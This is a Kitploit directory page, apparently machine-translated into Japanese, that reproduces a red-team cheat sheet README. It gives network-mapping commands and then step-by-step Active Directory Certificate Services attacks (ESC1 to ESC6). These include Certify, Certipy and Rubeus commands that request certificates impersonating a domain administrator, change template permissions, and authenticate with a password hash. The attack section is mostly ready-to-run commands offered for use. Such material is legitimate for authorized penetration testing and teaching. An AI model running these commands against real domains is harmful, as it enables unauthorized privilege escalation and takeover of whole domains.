Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/ihebski/a-red-teamer-diaries
特権昇格脆弱性分析エクスプロイト横移動情報収集ポストエクスプロイトペネトレーションテスト学習と教育レッドチーミング厳選リソース
GitHubihebski/a-red-teamer-diaries

A-Red-Teamer-diaries

RedTeam/Pentest のメモと、プロフェッショナルなエンゲージメントに関連する複数のインフラストラクチャでテストされた実験。

リポジトリを見る
1.9k3152911ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

レッドチーマーの日記

ペネトレーションテスターやレッドチーマーがセキュリティ評価中に使用するさまざまなツールやテクニックを用いた、複数の制御された環境/インフラでテストした私のペネトレーションテスト/レッドチーミング実験に関する公開メモです。

  • 進行中のプロジェクト

貢献

GitHubのプルリクエストとしての貢献を歓迎します。
尽力してくれた人々に感謝と称賛を

目標

  • ペンテスト/レッドチームのチートシート。エンゲージメント中にペンテスターが時間を節約し、特定のコマンドを素早く検索できるよう、コードやコマンドの断片を収集します。
  • 攻撃がどのように実行されるかを理解する
  • 将来の参照用にメモを取る

免責事項

教育目的のみで使用し、自己責任で使用してください。

侵入キルチェーン

KillChain

ネットワークのマッピング

RunFinger.py

ネットワーク上で動作しているドメイン名とWindowsマシンに関する情報を収集します。```bash bash$ cd /usr/share/Responder/tools bash$ sudo python RunFinger.py -i 192.168.1.1/24

または```bash
bash$ responder-RunFinger

Nbtscan

IPネットワークをスキャンしてNetBIOS名情報を取得します。```bash bash$ sudo nbtscan -v -s : 192.168.1.0/24

## Crackmapexec v 4.0

SMB情報に基づいてネットワーク範囲をスキャンします。```bash
bash$ cme smb 192.168.1.1/24

Nmapスキャン

すべてのマシンネットワークをスキャンし、出力を保存します。

  • -oA オプション: すべての形式で出力することを意味します
  • -T4 : 高速スキャン

高速スキャン```bash bash$ nmap -p 1-65535 -sV -sS -T4 -oA output target_IP

集中スキャン(推奨注意):```bash
bash$ nmap -p 1-65535 -Pn -A -oA output target_IP 

Scan with enumeration of the running services version :

  • -sC : default scripts Equivalent to --script=default
  • -sV : Get the service version```bash bash$ nmap -sC -sV -oA output target
## Angry IP スキャナー

このリンクからツールをダウンロードしてください : 
[Angry IP Scanner](http://angryip.org/download/#linux) 
* 環境設定を変更する 
> Preferences -> Ports に移動 : ポート選択に 80,445,554,21 ,22 を追加 <br>
> Preferences -> Display に移動 : Alive Hosts を選択 <br>
> Preferences -> Pinging に移動 : Combained (UDP/TCP) を選択 <br>

# 横方向移動とエクスプロイト

### Active Directory 証明書サービス
この部分は https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#esc1---misconfigured-certificate-templates からコピーしました
<br>詳細は https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation を確認してください

(プライベート環境でテスト済み (Bloodhound 次に ESC1 エクスプロイト)) 
* ADCS サーバーを見つける
  * `crackmapexec ldap domain.lab -u username -p password -M adcs`
  * `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=<user>,OU=Users,DC=domain,DC=local' -w '<password>' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName`
* certutil を使用して AD エンタープライズ CA を列挙する: `certutil.exe -config - -ping`, `certutil -dump`

#### ESC1 - 誤設定された証明書テンプレート

> ドメインユーザーは **VulnTemplate** テンプレートに登録できます。このテンプレートはクライアント認証に使用でき、**ENROLLEE_SUPPLIES_SUBJECT** が設定されています。これにより、誰でもこのテンプレートに登録し、任意の Subject Alternative Name (すなわち DA として) を指定できます。サブジェクトを超えて証明書に追加の ID をバインドできます。

要件:
*  AD 認証を許可するテンプレート
* **ENROLLEE_SUPPLIES_SUBJECT** フラグ
* [PKINIT] クライアント認証、スマートカードログオン、任意の目的、または EKU なし (拡張キー使用法) 

エクスプロイト:
* 脆弱なテンプレートがあるかどうかを確認するには [Certify.exe](https://github.com/GhostPack/Certify) を使用します
    ```ps1
    Certify.exe find /vulnerable
    Certify.exe find /vulnerable /currentuser
    # or
    PS> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local'
    # or
    certipy 'domain.local'/'user':'password'@'domaincontroller' find -bloodhound
    ```
* Certify、[Certi](https://github.com/eloypgz/certi)、または [Certipy](https://github.com/ly4k/Certipy) を使用して証明書を要求し、代替名 (偽装するユーザー) を追加します
    ```ps1
    # request certificates for the machine account by executing Certify with the "/machine" argument from an elevated command prompt.
    Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:VulnTemplate /altname:domadmin
    certi.py req 'contoso.local/[email protected]' contoso-DC01-CA -k -n --alt-name han --template UserSAN
    certipy req 'corp.local/john:[email protected]' -ca 'corp-CA' -template 'ESC1' -alt '[email protected]'
    ```
* OpenSSL を使用して証明書を変換します。パスワードを入力しないでください
    ```ps1
    openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
    ```
* cert.pfx をターゲットマシンのファイルシステムに移動し、Rubeus を使用して altname ユーザーの TGT を要求します
    ```ps1
    Rubeus.exe asktgt /user:domadmin /certificate:C:\Temp\cert.pfx
    ```

**警告**: これらの証明書は、ユーザーまたはコンピューターがパスワードをリセットしても引き続き使用できます!

**注**: **EDITF_ATTRIBUTESUBJECTALTNAME2**、**CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT**、**ManageCA** フラグ、および AD CS HTTP エンドポイントへの NTLM リレーを探してください。

#### ESC2 - 誤設定された証明書テンプレート

要件:
* 要求者が CSR で Subject Alternative Name (SAN) を指定できるようにし、また Any Purpose EKU (2.5.29.37.0) を許可します

エクスプロイト:
* テンプレートを見つける  ```ps1
  PS > Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))' -SearchBase 'CN=Configuration,DC=megacorp,DC=local'
  • ESC1と同様に、/altnameをドメイン管理者として指定して証明書を要求します。

ESC3 - 構成に誤りのある登録エージェントテンプレート

ESC3は、証明書テンプレートがCertificate Request Agent EKU(登録エージェント)を指定している場合です。このEKUを使用して、他のユーザーに代わって証明書を要求できます。

  • 脆弱な証明書テンプレートESC3に基づいて証明書を要求します。 ```ps1 $ certipy req 'corp.local/john:[email protected]' -ca 'corp-CA' -template 'ESC3' [*] Saved certificate and private key to 'john.pfx'
  • Certificate Request Agent 証明書 (-pfx) を使用して、別のユーザーに代わって証明書を要求します。 ```ps1 $ certipy req 'corp.local/john:[email protected]' -ca 'corp-CA' -template 'User' -on-behalf-of 'corp\administrator' -pfx 'john.pfx'

ESC4 - アクセス制御の脆弱性

ドメイン認証を許可するテンプレートに対して、mspki-certificate-name-flagフラグを有効にすると、攻撃者が「設定ミスをテンプレートにプッシュしてESC1の脆弱性を引き起こす」ことを可能にします。

  • WritePropertyの値が00000000-0000-0000-0000-000000000000であるものを、modifyCertTemplateを使用して検索します。 ```ps1 python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -get-acl

  • ESC1を実行するために、ENROLLEE_SUPPLIES_SUBJECT (ESS) フラグを追加する ```ps1 python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -add enrollee_supplies_subject -property mspki-Certificate-Name-Flag

    Add/remove ENROLLEE_SUPPLIES_SUBJECT flag from the WebServer template.

    C:>StandIn.exe --adcs --filter WebServer --ess --add

  • ESC1を実行し、その後値を復元する ```ps1 python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -value 0 -property mspki-Certificate-Name-Flag

Certipyの使い方```ps1

overwrite the configuration to make it vulnerable to ESC1

certipy template 'corp.local/[email protected]' -hashes :fc525c9683e8fe067095ba2ddc971889 -template 'ESC4' -save-old

request a certificate based on the ESC4 template, just like ESC1.

certipy req 'corp.local/john:[email protected]' -ca 'corp-CA' -template 'ESC4' -alt '[email protected]'

restore the old configuration

certipy template 'corp.local/[email protected]' -hashes :fc525c9683e8fe067095ba2ddc971889 -template 'ESC4' -configuration ESC4.json

#### ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 

> このフラグがCAに設定されている場合、サブジェクトがActive Directoryから構築される場合を含むすべてのリクエストで、サブジェクト代替名にユーザー定義の値を設定できます。 

悪用方法:
* [Certify.exe](https://github.com/GhostPack/Certify) を使用して、`EDITF_ATTRIBUTESUBJECTALTNAME2` フラグを指す **UserSpecifiedSAN** フラグの状態を確認します。
    ```ps1
    Certify.exe cas
    ```
* デフォルトの `User` テンプレートは通常、代替名の指定を許可しませんが、テンプレート用の証明書を要求し、altname を追加します。
    ```ps1
    .\Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:User /altname:DomAdmin
    ```
ツールをダウンロード